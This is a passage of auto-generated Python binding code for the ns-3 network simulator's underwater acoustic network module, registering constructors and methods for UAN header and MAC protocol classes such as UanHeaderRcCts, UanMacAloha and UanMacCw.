## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon::UanHeaderCommon(ns3::UanAddress const src, ns3::UanAddress const dest, uint8_t type) [constructor]
cls.add_constructor([param('ns3::UanAddress const', 'src'), param('ns3::UanAddress const', 'dest'), param('uint8_t', 'type')])
## uan-header-common.h (module 'uan'): uint32_t ns3::UanHeaderCommon::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-common.h (module 'uan'): ns3::UanAddress ns3::UanHeaderCommon::GetDest() const [member function]
cls.add_method('GetDest',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-common.h (module 'uan'): ns3::TypeId ns3::UanHeaderCommon::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): uint32_t ns3::UanHeaderCommon::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): ns3::UanAddress ns3::UanHeaderCommon::GetSrc() const [member function]
cls.add_method('GetSrc',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-common.h (module 'uan'): uint8_t ns3::UanHeaderCommon::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## uan-header-common.h (module 'uan'): static ns3::TypeId ns3::UanHeaderCommon::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetDest(ns3::UanAddress dest) [member function]
cls.add_method('SetDest',
'void',
[param('ns3::UanAddress', 'dest')])
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetSrc(ns3::UanAddress src) [member function]
cls.add_method('SetSrc',
'void',
[param('ns3::UanAddress', 'src')])
## uan-header-common.h (module 'uan'): void ns3::UanHeaderCommon::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
return
def register_Ns3UanHeaderRcAck_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck::UanHeaderRcAck(ns3::UanHeaderRcAck const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcAck const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck::UanHeaderRcAck() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::AddNackedFrame(uint8_t frame) [member function]
cls.add_method('AddNackedFrame',
'void',
[param('uint8_t', 'frame')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcAck::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcAck::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcAck::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): std::set<unsigned char, std::less<unsigned char>, std::allocator<unsigned char> > const & ns3::UanHeaderRcAck::GetNackedFrames() const [member function]
cls.add_method('GetNackedFrames',
'std::set< unsigned char > const &',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcAck::GetNoNacks() const [member function]
cls.add_method('GetNoNacks',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcAck::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcAck::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcAck::SetFrameNo(uint8_t frameNo) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNo')])
return
def register_Ns3UanHeaderRcCts_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts(ns3::UanHeaderRcCts const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcCts const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts::UanHeaderRcCts(uint8_t frameNo, uint8_t retryNo, ns3::Time rtsTs, ns3::Time delay, ns3::UanAddress addr) [constructor]
cls.add_constructor([param('uint8_t', 'frameNo'), param('uint8_t', 'retryNo'), param('ns3::Time', 'rtsTs'), param('ns3::Time', 'delay'), param('ns3::UanAddress', 'addr')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCts::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::UanAddress ns3::UanHeaderRcCts::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::UanAddress',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCts::GetDelayToTx() const [member function]
cls.add_method('GetDelayToTx',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcCts::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcCts::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcCts::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCts::GetRtsTimeStamp() const [member function]
cls.add_method('GetRtsTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCts::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcCts::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetDelayToTx(ns3::Time delay) [member function]
cls.add_method('SetDelayToTx',
'void',
[param('ns3::Time', 'delay')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetFrameNo(uint8_t frameNo) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNo')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetRetryNo(uint8_t no) [member function]
cls.add_method('SetRetryNo',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCts::SetRtsTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetRtsTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
return
def register_Ns3UanHeaderRcCtsGlobal_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal(ns3::UanHeaderRcCtsGlobal const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcCtsGlobal const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal::UanHeaderRcCtsGlobal(ns3::Time wt, ns3::Time ts, uint16_t rate, uint16_t retryRate) [constructor]
cls.add_constructor([param('ns3::Time', 'wt'), param('ns3::Time', 'ts'), param('uint16_t', 'rate'), param('uint16_t', 'retryRate')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCtsGlobal::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcCtsGlobal::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcCtsGlobal::GetRateNum() const [member function]
cls.add_method('GetRateNum',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcCtsGlobal::GetRetryRate() const [member function]
cls.add_method('GetRetryRate',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcCtsGlobal::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCtsGlobal::GetTxTimeStamp() const [member function]
cls.add_method('GetTxTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcCtsGlobal::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcCtsGlobal::GetWindowTime() const [member function]
cls.add_method('GetWindowTime',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetRateNum(uint16_t rate) [member function]
cls.add_method('SetRateNum',
'void',
[param('uint16_t', 'rate')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetRetryRate(uint16_t rate) [member function]
cls.add_method('SetRetryRate',
'void',
[param('uint16_t', 'rate')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetTxTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetTxTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcCtsGlobal::SetWindowTime(ns3::Time t) [member function]
cls.add_method('SetWindowTime',
'void',
[param('ns3::Time', 't')])
return
def register_Ns3UanHeaderRcData_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData(ns3::UanHeaderRcData const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcData const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData::UanHeaderRcData(uint8_t frameNum, ns3::Time propDelay) [constructor]
cls.add_constructor([param('uint8_t', 'frameNum'), param('ns3::Time', 'propDelay')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcData::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcData::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcData::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcData::GetPropDelay() const [member function]
cls.add_method('GetPropDelay',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcData::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcData::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::SetFrameNo(uint8_t frameNum) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'frameNum')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcData::SetPropDelay(ns3::Time propDelay) [member function]
cls.add_method('SetPropDelay',
'void',
[param('ns3::Time', 'propDelay')])
return
def register_Ns3UanHeaderRcRts_methods(root_module, cls):
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts(ns3::UanHeaderRcRts const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHeaderRcRts const &', 'arg0')])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts() [constructor]
cls.add_constructor([])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts::UanHeaderRcRts(uint8_t frameNo, uint8_t retryNo, uint8_t noFrames, uint16_t length, ns3::Time ts) [constructor]
cls.add_constructor([param('uint8_t', 'frameNo'), param('uint8_t', 'retryNo'), param('uint8_t', 'noFrames'), param('uint16_t', 'length'), param('ns3::Time', 'ts')])
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcRts::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetFrameNo() const [member function]
cls.add_method('GetFrameNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): ns3::TypeId ns3::UanHeaderRcRts::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): uint16_t ns3::UanHeaderRcRts::GetLength() const [member function]
cls.add_method('GetLength',
'uint16_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetNoFrames() const [member function]
cls.add_method('GetNoFrames',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint8_t ns3::UanHeaderRcRts::GetRetryNo() const [member function]
cls.add_method('GetRetryNo',
'uint8_t',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): uint32_t ns3::UanHeaderRcRts::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): ns3::Time ns3::UanHeaderRcRts::GetTimeStamp() const [member function]
cls.add_method('GetTimeStamp',
'ns3::Time',
[],
is_const=True)
## uan-header-rc.h (module 'uan'): static ns3::TypeId ns3::UanHeaderRcRts::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetFrameNo(uint8_t fno) [member function]
cls.add_method('SetFrameNo',
'void',
[param('uint8_t', 'fno')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetLength(uint16_t length) [member function]
cls.add_method('SetLength',
'void',
[param('uint16_t', 'length')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetNoFrames(uint8_t no) [member function]
cls.add_method('SetNoFrames',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetRetryNo(uint8_t no) [member function]
cls.add_method('SetRetryNo',
'void',
[param('uint8_t', 'no')])
## uan-header-rc.h (module 'uan'): void ns3::UanHeaderRcRts::SetTimeStamp(ns3::Time timeStamp) [member function]
cls.add_method('SetTimeStamp',
'void',
[param('ns3::Time', 'timeStamp')])
return
def register_Ns3UanMac_methods(root_module, cls):
## uan-mac.h (module 'uan'): ns3::UanMac::UanMac() [constructor]
cls.add_constructor([])
## uan-mac.h (module 'uan'): ns3::UanMac::UanMac(ns3::UanMac const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMac const &', 'arg0')])
## uan-mac.h (module 'uan'): int64_t ns3::UanMac::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): bool ns3::UanMac::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): ns3::Address ns3::UanMac::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): ns3::Address ns3::UanMac::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## uan-mac.h (module 'uan'): static ns3::TypeId ns3::UanMac::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_pure_virtual=True, is_virtual=True)
## uan-mac.h (module 'uan'): void ns3::UanMac::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanMacAloha_methods(root_module, cls):
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha::UanMacAloha(ns3::UanMacAloha const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacAloha const &', 'arg0')])
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha::UanMacAloha() [constructor]
cls.add_constructor([])
## uan-mac-aloha.h (module 'uan'): int64_t ns3::UanMacAloha::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): bool ns3::UanMacAloha::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): ns3::Address ns3::UanMacAloha::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): ns3::Address ns3::UanMacAloha::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-aloha.h (module 'uan'): static ns3::TypeId ns3::UanMacAloha::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-aloha.h (module 'uan'): void ns3::UanMacAloha::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanMacCw_methods(root_module, cls):
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw::UanMacCw(ns3::UanMacCw const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacCw const &', 'arg0')])
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw::UanMacCw() [constructor]
cls.add_constructor([])
## uan-mac-cw.h (module 'uan'): int64_t ns3::UanMacCw::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): bool ns3::UanMacCw::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Address ns3::UanMacCw::GetAddress() [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Address ns3::UanMacCw::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-mac-cw.h (module 'uan'): uint32_t ns3::UanMacCw::GetCw() [member function]
cls.add_method('GetCw',
'uint32_t',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): ns3::Time ns3::UanMacCw::GetSlotTime() [member function]
cls.add_method('GetSlotTime',
'ns3::Time',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): static ns3::TypeId ns3::UanMacCw::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyCcaEnd() [member function]
cls.add_method('NotifyCcaEnd',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyCcaStart() [member function]
cls.add_method('NotifyCcaStart',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxEndError() [member function]
cls.add_method('NotifyRxEndError',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxEndOk() [member function]
cls.add_method('NotifyRxEndOk',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyRxStart() [member function]
cls.add_method('NotifyRxStart',
'void',
[],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::NotifyTxStart(ns3::Time duration) [member function]
cls.add_method('NotifyTxStart',
'void',
[param('ns3::Time', 'duration')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetAddress(ns3::UanAddress addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::UanAddress', 'addr')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetCw(uint32_t cw) [member function]
cls.add_method('SetCw',
'void',
[param('uint32_t', 'cw')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetForwardUpCb(ns3::Callback<void, ns3::Ptr<ns3::Packet>, ns3::UanAddress const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetForwardUpCb',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::UanAddress const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::SetSlotTime(ns3::Time duration) [member function]
cls.add_method('SetSlotTime',
'void',
[param('ns3::Time', 'duration')],
is_virtual=True)
## uan-mac-cw.h (module 'uan'): void ns3::UanMacCw::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanMacRc_methods(root_module, cls):
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc::UanMacRc(ns3::UanMacRc const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanMacRc const &', 'arg0')])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc::UanMacRc() [constructor]
cls.add_constructor([])
## uan-mac-rc.h (module 'uan'): int64_t ns3::UanMacRc::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::AttachPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('AttachPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): void ns3::UanMacRc::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-mac-rc.h (module 'uan'): bool ns3::UanMacRc::Enqueue(ns3::Ptr<ns3::Packet> pkt, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Enqueue',
'bool',
